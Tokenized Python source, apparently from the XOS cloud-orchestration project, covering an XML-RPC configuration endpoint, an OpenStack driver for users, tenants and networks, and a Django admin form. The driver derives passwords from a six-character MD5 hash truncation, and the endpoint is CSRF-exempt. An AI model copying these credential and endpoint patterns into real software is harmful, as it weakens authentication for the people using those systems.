and ( template . translation == "<STR_LIT:none>" ) : <EOL> ip = port . ip <EOL> if not ip : <EOL> continue <EOL> interface = { "<STR_LIT>" : node_id , <EOL> "<STR_LIT>" : ip , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : node_id , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> interfaces . append ( interface ) <EOL> return interfaces <EOL> def GetConfiguration ( name , slice_remap = { } ) : <EOL> slicename = name [ "<STR_LIT:name>" ] <EOL> if "<STR_LIT>" in name : <EOL> node_id = name [ "<STR_LIT>" ] <EOL> else : <EOL> node_id = <NUM_LIT:0> <EOL> node_instance_tags = GetTags ( slicename , node_id ) <EOL> slices = GetSlices ( { "<STR_LIT:name>" : slicename } , slice_remap = slice_remap ) <EOL> perhost = { } <EOL> allinterfaces = { } <EOL> hostprivmap = { } <EOL> hostipmap = { } <EOL> hostnatmap = { } <EOL> nodes = [ ] <EOL> if len ( slices ) == <NUM_LIT:1> : <EOL> slice = slices [ <NUM_LIT:0> ] <EOL> node_ids = slice [ '<STR_LIT>' ] <EOL> nodes = GetNodes ( node_ids , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , slice_remap = slice_remap ) <EOL> nodemap = { } <EOL> for node in nodes : <EOL> nodemap [ node [ '<STR_LIT>' ] ] = node [ '<STR_LIT>' ] <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids ) <EOL> hostipmap = { } <EOL> for interface in interfaces : <EOL> if nodemap [ interface [ '<STR_LIT>' ] ] not in allinterfaces : <EOL> allinterfaces [ nodemap [ interface [ '<STR_LIT>' ] ] ] = [ ] <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> allinterfaces [ nodemap [ interface [ '<STR_LIT>' ] ] ] . append ( interface ) <EOL> if interface [ '<STR_LIT>' ] : <EOL> hostipmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> hostnatmap = { } <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids , return_nat = True ) <EOL> for interface in interfaces : <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> hostnatmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> hostprivmap = { } <EOL> interfaces = GetInterfaces ( slice [ "<STR_LIT>" ] , node_ids , return_private = True ) <EOL> for interface in interfaces : <EOL> interface [ '<STR_LIT>' ] = [ ] <EOL> hostprivmap [ nodemap [ interface [ '<STR_LIT>' ] ] ] = interface [ '<STR_LIT>' ] <EOL> for nid in node_ids : <EOL> instance_tags = GetTags ( slicename , nid ) <EOL> perhost [ nodemap [ nid ] ] = instance_tags <EOL> instances = GetSlices ( slice_remap = slice_remap ) <EOL> if node_id != <NUM_LIT:0> : <EOL> instances = [ slice for slice in instances if ( node_id in slice . node_ids ) ] <EOL> sites = GetSites ( slice_remap = slice_remap ) <EOL> for site in sites : <EOL> site [ "<STR_LIT>" ] = [ ] <EOL> timestamp = int ( time . time ( ) ) <EOL> return { '<STR_LIT:version>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : node_instance_tags , <EOL> '<STR_LIT>' : perhost , <EOL> '<STR_LIT>' : hostipmap , <EOL> '<STR_LIT>' : hostnatmap , <EOL> '<STR_LIT>' : hostprivmap , <EOL> '<STR_LIT>' : instances , <EOL> '<STR_LIT>' : allinterfaces , <EOL> '<STR_LIT>' : sites , <EOL> '<STR_LIT>' : nodes } <EOL> DEFAULT_REMAP = { "<STR_LIT>" : [ "<STR_LIT>" , <NUM_LIT> ] } <EOL> def HandleGetConfiguration1 ( ) : <EOL> configs = { } <EOL> for slicename in [ "<STR_LIT>" ] : <EOL> configs [ slicename ] = GetConfiguration ( { "<STR_LIT:name>" : slicename } , DEFAULT_REMAP ) <EOL> return configs <EOL> def HandleGetNodes1 ( ) : <EOL> return GetNodes ( slice_remap = DEFAULT_REMAP ) <EOL> def HandleGetSlices1 ( ) : <EOL> return GetSlices ( slice_remap = DEFAULT_REMAP ) <EOL> def HandleGetConfiguration2 ( name , slice_remap ) : <EOL> return GetConfiguration ( name , slice_remap = slice_remap ) <EOL> def HandleGetNodes2 ( slice_remap ) : <EOL> return GetNodes ( slice_remap = slice_remap ) <EOL> def HandleGetSlices2 ( slice_remap ) : <EOL> return GetSlices ( slice_remap = slice_remap ) <EOL> FUNCS = { "<STR_LIT>" : HandleGetConfiguration1 , <EOL> "<STR_LIT>" : HandleGetNodes1 , <EOL> "<STR_LIT>" : HandleGetSlices1 , <EOL> "<STR_LIT>" : HandleGetConfiguration2 , <EOL> "<STR_LIT>" : HandleGetNodes2 , <EOL> "<STR_LIT>" : HandleGetSlices2 } <EOL> @ csrf_exempt <EOL> def LegacyXMLRPC ( request ) : <EOL> if request . method == "<STR_LIT:POST>" : <EOL> try : <EOL> ( args , method ) = xmlrpclib . loads ( request . body ) <EOL> result = None <EOL> if method in FUNCS : <EOL> result = FUNCS [ method ] ( * args ) <EOL> return HttpResponse ( xmlrpclib . dumps ( ( result , ) , methodresponse = True , allow_none = <NUM_LIT:1> ) ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> return HttpResponseServerError ( ) <EOL> else : <EOL> return HttpResponse ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> slices = GetSlices ( slice_remap = DEFAULT_REMAP ) <EOL> nodes = GetNodes ( slice_remap = DEFAULT_REMAP ) <EOL> config = GetConfiguration ( { "<STR_LIT:name>" : "<STR_LIT>" } , slice_remap = DEFAULT_REMAP ) <EOL> print config <EOL> print slices <EOL> print nodes </s>
<s> import commands <EOL> import hashlib <EOL> from xos . config import Config <EOL> from core . models import Controller <EOL> try : <EOL> from openstack . client import OpenStackClient <EOL> has_openstack = True <EOL> except : <EOL> has_openstack = False <EOL> manager_enabled = Config ( ) . api_nova_enabled <EOL> class OpenStackDriver : <EOL> def __init__ ( self , config = None , client = None ) : <EOL> if config : <EOL> self . config = Config ( config ) <EOL> else : <EOL> self . config = Config ( ) <EOL> if client : <EOL> self . shell = client <EOL> self . enabled = manager_enabled <EOL> self . has_openstack = has_openstack <EOL> self . controller = None <EOL> self . admin_user = None <EOL> def client_driver ( self , caller = None , tenant = None , controller = None ) : <EOL> if caller : <EOL> auth = { '<STR_LIT:username>' : caller . email , <EOL> '<STR_LIT:password>' : hashlib . md5 ( caller . password ) . hexdigest ( ) [ : <NUM_LIT:6> ] , <EOL> '<STR_LIT>' : tenant } <EOL> client = OpenStackClient ( controller = controller , cacert = self . config . nova_ca_ssl_cert , ** auth ) <EOL> else : <EOL> admin_driver = self . admin_driver ( tenant = tenant , controller = controller ) <EOL> client = OpenStackClient ( tenant = tenant , controller = admin_driver . controller ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> return driver <EOL> def admin_driver ( self , tenant = None , controller = None ) : <EOL> if isinstance ( controller , int ) : <EOL> controller = Controller . objects . get ( id = controller . id ) <EOL> if not tenant : <EOL> tenant = controller . admin_tenant <EOL> client = OpenStackClient ( tenant = tenant , controller = controller , cacert = self . config . nova_ca_ssl_cert ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> driver . admin_user = client . keystone . users . find ( name = controller . admin_user ) <EOL> driver . controller = controller <EOL> return driver <EOL> def create_role ( self , name ) : <EOL> roles = self . shell . keystone . roles . findall ( name = name ) <EOL> roles_title = self . shell . keystone . roles . findall ( name = name . title ( ) ) <EOL> roles_found = roles + roles_title <EOL> if not roles_found : <EOL> role = self . shell . keystone . roles . create ( name ) <EOL> else : <EOL> role = roles_found [ <NUM_LIT:0> ] <EOL> return role <EOL> def delete_role ( self , filter ) : <EOL> roles = self . shell . keystone . roles . findall ( ** filter ) <EOL> for role in roles : <EOL> self . shell . keystone . roles . delete ( role ) <EOL> return <NUM_LIT:1> <EOL> def create_tenant ( self , tenant_name , enabled , description ) : <EOL> """<STR_LIT>""" <EOL> tenants = self . shell . keystone . tenants . findall ( name = tenant_name ) <EOL> if not tenants : <EOL> fields = { '<STR_LIT>' : tenant_name , '<STR_LIT>' : enabled , <EOL> '<STR_LIT:description>' : description } <EOL> tenant = self . shell . keystone . tenants . create ( ** fields ) <EOL> else : <EOL> tenant = tenants [ <NUM_LIT:0> ] <EOL> self . add_user_role ( self . admin_user . id , tenant . id , '<STR_LIT>' ) <EOL> return tenant <EOL> def update_tenant ( self , id , ** kwds ) : <EOL> return self . shell . keystone . tenants . update ( id , ** kwds ) <EOL> def delete_tenant ( self , id ) : <EOL> ctx = self . shell . nova_db . ctx <EOL> tenants = self . shell . keystone . tenants . findall ( id = id ) <EOL> for tenant in tenants : <EOL> instances = self . shell . nova_db . instance_get_all_by_filters ( ctx , <EOL> { '<STR_LIT>' : tenant . id } , '<STR_LIT:id>' , '<STR_LIT>' ) <EOL> client = OpenStackClient ( tenant = tenant . name ) <EOL> driver = OpenStackDriver ( client = client ) <EOL> for instance in instances : <EOL> driver . destroy_instance ( instance . id ) <EOL> self . shell . keystone . tenants . delete ( tenant ) <EOL> return <NUM_LIT:1> <EOL> def create_user ( self , name , email , password , enabled ) : <EOL> users = self . shell . keystone . users . findall ( email = email ) <EOL> if not users : <EOL> fields = { '<STR_LIT:name>' : name , '<STR_LIT:email>' : email , '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : enabled } <EOL> user = self . shell . keystone . users . create ( ** fields ) <EOL> else : <EOL> user = users [ <NUM_LIT:0> ] <EOL> return user <EOL> def delete_user ( self , id ) : <EOL> users = self . shell . keystone . users . findall ( id = id ) <EOL> for user in users : <EOL> keys = self . shell . nova . keypairs . findall ( ) <EOL> for key in keys : <EOL> self . shell . nova . keypairs . delete ( key ) <EOL> self . shell . keystone . users . delete ( user ) <EOL> return <NUM_LIT:1> <EOL> def get_admin_role ( self ) : <EOL> role = None <EOL> for admin_role_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> roles = self . shell . keystone . roles . findall ( name = admin_role_name ) <EOL> if roles : <EOL> role = roles [ <NUM_LIT:0> ] <EOL> break <EOL> return role <EOL> def add_user_role ( self , kuser_id , tenant_id , role_name ) : <EOL> user = self . shell . keystone . users . find ( id = kuser_id ) <EOL> tenant = self . shell . keystone . tenants . find ( id = tenant_id ) <EOL> role = None <EOL> if role_name . lower ( ) == '<STR_LIT>' : <EOL> role = self . get_admin_role ( ) <EOL> else : <EOL> role = self . shell . keystone . roles . find ( name = role_name ) <EOL> role_found = False <EOL> user_roles = user . list_roles ( tenant . id ) <EOL> for user_role in user_roles : <EOL> if user_role . name == role . name : <EOL> role_found = True <EOL> if not role_found : <EOL> tenant . add_user ( user , role ) <EOL> return <NUM_LIT:1> <EOL> def delete_user_role ( self , kuser_id , tenant_id , role_name ) : <EOL> user = self . shell . keystone . users . find ( id = kuser_id ) <EOL> tenant = self . shell . keystone . tenants . find ( id = tenant_id ) <EOL> role = None <EOL> if role_name . lower ( ) == '<STR_LIT>' : <EOL> role = self . get_admin_role ( ) <EOL> else : <EOL> role = self . shell . keystone . roles . find ( name = role_name ) <EOL> role_found = False <EOL> user_roles = user . list_roles ( tenant . id ) <EOL> for user_role in user_roles : <EOL> if user_role . name == role . name : <EOL> role_found = True <EOL> if role_found : <EOL> tenant . remove_user ( user , role ) <EOL> return <NUM_LIT:1> <EOL> def update_user ( self , id , fields ) : <EOL> if '<STR_LIT:password>' in fields : <EOL> self . shell . keystone . users . update_password ( id , fields [ '<STR_LIT:password>' ] ) <EOL> if '<STR_LIT>' in fields : <EOL> self . shell . keystone . users . update_enabled ( id , fields [ '<STR_LIT>' ] ) <EOL> return <NUM_LIT:1> <EOL> def create_router ( self , name , set_gateway = True ) : <EOL> routers = self . shell . quantum . list_routers ( name = name ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = self . shell . quantum . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : name } } ) [ '<STR_LIT>' ] <EOL> if set_gateway : <EOL> nets = self . shell . quantum . list_networks ( ) [ '<STR_LIT>' ] <EOL> for net in nets : <EOL> if net [ '<STR_LIT>' ] == True : <EOL> self . shell . quantum . add_gateway_router ( router [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : net [ '<STR_LIT:id>' ] } ) <EOL> return router <EOL> def delete_router ( self , id ) : <EOL> routers = self . shell . quantum . list_routers ( id = id ) [ '<STR_LIT>' ] <EOL> for router in routers : <EOL> self . shell . quantum . delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> def add_router_interface ( self , router_id , subnet_id ) : <EOL> router = self . shell . quantum . show_router ( router_id ) [ '<STR_LIT>' ] <EOL> subnet = self . shell . quantum . show_subnet ( subnet_id ) [ '<STR_LIT>' ] <EOL> if router and subnet : <EOL> self . shell . quantum . add_interface_router ( router_id , { '<STR_LIT>' : subnet_id } ) <EOL> def delete_router_interface ( self , router_id , subnet_id ) : <EOL> router = self . shell . quantum . show_router ( router_id ) <EOL> subnet = self . shell . quantum . show_subnet ( subnet_id ) <EOL> if router and subnet : <EOL> self . shell . quantum . remove_interface_router ( router_id , { '<STR_LIT>' : subnet_id } ) <EOL> def create_network ( self , name , shared = False ) : <EOL> nets = self . shell . quantum . list_networks ( name = name ) [ '<STR_LIT>' ] <EOL> if nets : <EOL> net = nets [ <NUM_LIT:0> ] <EOL> else : <EOL> net = self . shell . quantum . create_network ( { '<STR_LIT>' : { '<STR_LIT:name>' : name , '<STR_LIT>' : shared } } ) [ '<STR_LIT>' ] <EOL> return net <EOL> def delete_network ( self , id ) : <EOL> nets = self . shell . quantum . list_networks ( ) [ '<STR_LIT>' ] <EOL> for net in nets : <EOL> if net [ '<STR_LIT:id>' ] == id : <EOL> self . delete_network_ports ( net [ '<STR_LIT:id>' ] ) <EOL> for subnet_id in net [ '<STR_LIT>' ] : <EOL> self . delete_subnet ( subnet_id ) <EOL> self . shell . quantum . delete_network ( net [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def delete_network_ports ( self , network_id ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == network_id : <EOL> self . shell . quantum . delete_port ( port [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def delete_subnet_ports ( self , subnet_id ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> delete = False <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id : <EOL> delete = True <EOL> break <EOL> if delete : <EOL> self . shell . quantum . delete_port ( port [ '<STR_LIT:id>' ] ) <EOL> return <NUM_LIT:1> <EOL> def create_subnet ( self , name , network_id , cidr_ip , ip_version , start , end ) : <EOL> subnet = None <EOL> subnets = self . shell . quantum . list_subnets ( ) [ '<STR_LIT>' ] <EOL> for snet in subnets : <EOL> if snet [ '<STR_LIT>' ] == cidr_ip and snet [ '<STR_LIT>' ] == network_id : <EOL> subnet = snet <EOL> if not subnet : <EOL> metadata_ip = cidr_ip . replace ( "<STR_LIT>" , "<STR_LIT:3>" ) <EOL> allocation_pools = [ { '<STR_LIT:start>' : start , '<STR_LIT:end>' : end } ] <EOL> subnet = { '<STR_LIT>' : { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : network_id , <EOL> '<STR_LIT>' : ip_version , <EOL> '<STR_LIT>' : cidr_ip , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : metadata_ip } ] , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : allocation_pools } } <EOL> subnet = self . shell . quantum . create_subnet ( subnet ) [ '<STR_LIT>' ] <EOL> return subnet <EOL> def update_subnet ( self , id , fields ) : <EOL> return self . shell . quantum . update_subnet ( id , fields ) <EOL> def delete_subnet ( self , id ) : <EOL> subnets = self . shell . quantum . list_subnets ( ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> if subnet [ '<STR_LIT:id>' ] == id : <EOL> self . delete_subnet_ports ( subnet [ '<STR_LIT:id>' ] ) <EOL> self . shell . quantum . delete_subnet ( id ) <EOL> self . delete_external_route ( subnet ) <EOL> return <NUM_LIT:1> <EOL> def get_external_routes ( self ) : <EOL> status , output = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> routes = output . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:3> : ] <EOL> return routes <EOL> def add_external_route ( self , subnet , routes = [ ] ) : <EOL> if not routes : <EOL> routes = self . get_external_routes ( ) <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> gw_ip = subnet [ '<STR_LIT>' ] <EOL> subnet_id = subnet [ '<STR_LIT:id>' ] <EOL> ip_address = None <EOL> for port in ports : <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id and fixed_ip [ '<STR_LIT>' ] == gw_ip : <EOL> gw_port = port <EOL> router_id = gw_port [ '<STR_LIT>' ] <EOL> router = self . shell . quantum . show_router ( router_id ) [ '<STR_LIT>' ] <EOL> if router and router . get ( '<STR_LIT>' ) : <EOL> ext_net = router [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == router_id and port [ '<STR_LIT>' ] == ext_net : <EOL> ip_address = port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> route_exists = False <EOL> if routes : <EOL> for route in routes : <EOL> if subnet [ '<STR_LIT>' ] in route and ip_address in route : <EOL> route_exists = True <EOL> if not route_exists : <EOL> cmd = "<STR_LIT>" % ( subnet [ '<STR_LIT>' ] , ip_address ) <EOL> s , o = commands . getstatusoutput ( cmd ) <EOL> return <NUM_LIT:1> <EOL> def delete_external_route ( self , subnet ) : <EOL> ports = self . shell . quantum . list_ports ( ) [ '<STR_LIT>' ] <EOL> gw_ip = subnet [ '<STR_LIT>' ] <EOL> subnet_id = subnet [ '<STR_LIT:id>' ] <EOL> ip_address = None <EOL> for port in ports : <EOL> for fixed_ip in port [ '<STR_LIT>' ] : <EOL> if fixed_ip [ '<STR_LIT>' ] == subnet_id and fixed_ip [ '<STR_LIT>' ] == gw_ip : <EOL> gw_port = port <EOL> router_id = gw_port [ '<STR_LIT>' ] <EOL> router = self . shell . quantum . show_router ( router_id ) [ '<STR_LIT>' ] <EOL> ext_net = router [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> if port [ '<STR_LIT>' ] == router_id and port [ '<STR_LIT>' ] == ext_net : <EOL> ip_address = port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> cmd = "<STR_LIT>" % ( subnet [ '<STR_LIT>' ] ) <EOL> commands . getstatusoutput ( cmd ) <EOL> return <NUM_LIT:1> <EOL> def create_keypair ( self , name , public_key ) : <EOL> keys = self . shell . nova . keypairs . findall ( name = name ) <EOL> if keys : <EOL> key = keys [ <NUM_LIT:0> ] <EOL> if key . public_key != public_key : <EOL> self . delete_keypair ( key . id ) <EOL> key = self . shell . nova . keypairs . create ( name = name , public_key = public_key ) <EOL> else : <EOL> key = self . shell . nova . keypairs . create ( name = name , public_key = public_key ) <EOL> return key <EOL> def delete_keypair ( self , id ) : <EOL> keys = self . shell . nova . keypairs . findall ( id = id ) <EOL> for key in keys : <EOL> self . shell . nova . keypairs . delete ( key ) <EOL> return <NUM_LIT:1> <EOL> def get_private_networks ( self , tenant = None ) : <EOL> if not tenant : <EOL> tenant = self . shell . nova . tenant <EOL> tenant = self . shell . keystone . tenants . find ( name = tenant ) <EOL> search_opts = { "<STR_LIT>" : tenant . id , "<STR_LIT>" : False } <EOL> private_networks = self . shell . quantum . list_networks ( ** search_opts ) <EOL> return private_networks <EOL> def get_shared_networks ( self ) : <EOL> search_opts = { "<STR_LIT>" : True } <EOL> shared_networks = self . shell . quantum . list_networks ( ** search_opts ) <EOL> return shared_networks <EOL> def get_network_subnet ( self , network_id ) : <EOL> subnet_id = None <EOL> subnet = None <EOL> if network_id : <EOL> os_networks = self . shell . quantum . list_networks ( id = network_id ) [ "<STR_LIT>" ] <EOL> if os_networks : <EOL> os_network = os_networks [ <NUM_LIT:0> ] <EOL> if os_network [ '<STR_LIT>' ] : <EOL> subnet_id = os_network [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> os_subnets = self . shell . quantum . list_subnets ( id = subnet_id ) [ '<STR_LIT>' ] <EOL> if os_subnets : <EOL> subnet = os_subnets [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return ( subnet_id , subnet ) <EOL> def spawn_instance ( self , name , key_name = None , availability_zone = None , hostname = None , image_id = None , security_group = None , pubkeys = [ ] , nics = None , metadata = None , userdata = None , flavor_name = None ) : <EOL> if not flavor_name : <EOL> flavor_name = self . config . nova_default_flavor <EOL> flavor = self . shell . nova . flavors . find ( name = flavor_name ) <EOL> if not security_group : <EOL> security_group = self . config . nova_default_security_group <EOL> files = { } <EOL> hints = { } <EOL> availability_zone_filter = None <EOL> if availability_zone is None or not availability_zone : <EOL> availability_zone_filter = '<STR_LIT>' <EOL> else : <EOL> availability_zone_filter = availability_zone <EOL> if hostname : <EOL> availability_zone_filter += '<STR_LIT>' % hostname <EOL> server = self . shell . nova . servers . create ( <EOL> name = name , <EOL> key_name = key_name , <EOL> flavor = flavor . id , <EOL> image = image_id , <EOL> security_group = security_group , <EOL> scheduler_hints = hints , <EOL> availability_zone = availability_zone_filter , <EOL> nics = nics , <EOL> networks = nics , <EOL> meta = metadata , <EOL> userdata = userdata ) <EOL> return server <EOL> def destroy_instance ( self , id ) : <EOL> if ( self . shell . nova . tenant == "<STR_LIT>" ) : <EOL> servers = self . shell . nova . servers . list ( search_opts = { "<STR_LIT>" : True } ) <EOL> else : <EOL> servers = self . shell . nova . servers . list ( ) <EOL> for server in servers : <EOL> if server . id == id : <EOL> result = self . shell . nova . servers . delete ( server ) <EOL> def update_instance_metadata ( self , id , metadata ) : <EOL> servers = self . shell . nova . servers . findall ( id = id ) <EOL> for server in servers : <EOL> self . shell . nova . servers . set_meta ( server , metadata ) <EOL> def delete_instance_metadata ( self , id , metadata ) : <EOL> servers = self . shell . nova . servers . findall ( id = id ) <EOL> for server in servers : <EOL> self . shell . nova . servers . delete_meta ( server , metadata ) </s>
<s> from django . contrib import admin <EOL> from services . cord . models import * <EOL> from django import forms <EOL> from django . utils . safestring import mark_safe <EOL> from django . contrib . auth . admin import UserAdmin <EOL> from django . contrib . admin . widgets import FilteredSelectMultiple <EOL> from django . contrib . auth . forms import ReadOnlyPasswordHashField <EOL> from django . contrib . auth . signals import user_logged_in <EOL> from django . utils import timezone <EOL> from django . contrib . contenttypes import generic <EOL> from suit . widgets import LinkedSelect <EOL> from core . admin import ServiceAppAdmin , SliceInline , ServiceAttrAsTabInline , ReadOnlyAwareAdmin , XOSTabularInline , ServicePrivilegeInline , TenantRootTenantInline , TenantRootPrivilegeInline <EOL> from core . middleware import get_request <EOL> from services . vtn . models import * <EOL> from services . cord . models import CordSubscriberRoot <EOL> from functools import update_wrapper <EOL> from django . contrib . admin . views . main import ChangeList <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . admin . utils import quote <EOL> class VTNServiceForm ( forms . ModelForm ) : <EOL> privateGatewayMac = forms . CharField ( required = False ) <EOL> localManagementIp = forms . CharField ( required = False ) <EOL> ovsdbPort = forms . CharField ( required = False ) <EOL> sshPort = forms . CharField ( required = False ) <EOL> sshUser = forms . CharField ( required = False ) <EOL> sshKeyFile = forms . CharField ( required = False ) <EOL> mgmtSubnetBits = forms . CharField ( required = False ) <EOL> xosEndpoint = forms . CharField ( required = False ) <EOL> xosUser = forms . CharField ( required = False ) <EOL> xosPassword = forms . CharField ( required = False ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( VTNServiceForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if self . instance : <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . privateGatewayMac <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . localManagementIp <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . ovsdbPort <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshPort <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshUser <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshKeyFile <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . mgmtSubnetBits <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosEndpoint <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosUser <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosPassword <EOL> def save ( self , commit = True ) : <EOL> self . instance . privateGatewayMac = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . localManagementIp = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . ovsdbPort = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshPort = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshUser = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshKeyFile = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . mgmtSubnetBits = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosEndpoint = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosUser = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosPassword = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> return super ( VTNServiceForm , self ) . save ( commit = commit ) <EOL> class Meta : <EOL> model = VTNService <EOL> class VTNServiceAdmin ( ReadOnlyAwareAdmin ) : <EOL> model = VTNService <EOL> form = VTNServiceForm <EOL> verbose_name = "<STR_LIT>" <EOL> verbose_name_plural = "<STR_LIT>" <EOL> list_display = ( "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> list_display_links = ( '<STR_LIT>' , '<STR_LIT:name>' , ) <EOL> fieldsets = [ ( None , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' , "<STR_LIT>" , "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } ) ] <EOL> readonly_fields = ( '<STR_LIT>' , ) <EOL> inlines = [ SliceInline , ServiceAttrAsTabInline , ServicePrivilegeInline ] <EOL> extracontext_registered_admins = True <EOL> user_readonly_fields = [ "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:description>" ] <EOL> suit_form_tabs = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> suit_form_includes = ( <EOL> ) <EOL> def queryset ( self , request ) : <EOL> return VTNService . get_service_objects_by_user ( request . user ) <EOL> admin . site . register ( VTNService , VTNServiceAdmin ) </s>
<s> import os <EOL> import base64 <EOL> from datetime import datetime <EOL> from xos . config import Config <EOL> from xos . logger import Logger , logging <EOL> from synchronizers . base . steps import * <EOL> from django . db . models import F , Q <EOL> from core . models import * <EOL> from django . db import reset_queries <EOL> import json <EOL> import time <EOL> import pdb <EOL> import traceback <EOL> logger = Logger ( level = logging . INFO ) <EOL> def f7 ( seq ) : <EOL> seen = set ( ) <EOL> seen_add = seen . add <EOL> return [ x for x in seq if not ( x in seen or seen_add ( x ) ) ] <EOL> def elim_dups ( backend_str ) : <EOL> strs = backend_str . split ( '<STR_LIT:/>' ) <EOL> strs = map ( lambda x : x . split ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] , strs ) <EOL> strs2 = f7 ( strs ) <EOL> return '<STR_LIT:/>' . join ( strs2 ) <EOL> def deepgetattr ( obj , attr ) : <EOL> return reduce ( getattr , attr . split ( '<STR_LIT:.>' ) , obj ) <EOL> class InnocuousException ( Exception ) : <EOL> pass <EOL> class FailedDependency ( Exception ) : <EOL> pass <EOL> class SyncStep ( object ) : <EOL> """<STR_LIT>""" <EOL> slow = False <EOL> def get_prop ( prop ) : <EOL> try : <EOL> sync_config_dir = Config ( ) . sync_config_dir <EOL> except : <EOL> sync_config_dir = '<STR_LIT>' <EOL> prop_config_path = '<STR_LIT:/>' . join ( sync_config_dir , self . name , prop ) <EOL> return open ( prop_config_path ) . read ( ) . rstrip ( ) <EOL> def __init__ ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> dependencies = [ ] <EOL> self . driver = args . get ( '<STR_LIT>' ) <EOL> self . error_map = args . get ( '<STR_LIT>' ) <EOL> try : <EOL> self . soft_deadline = int ( self . get_prop ( '<STR_LIT>' ) 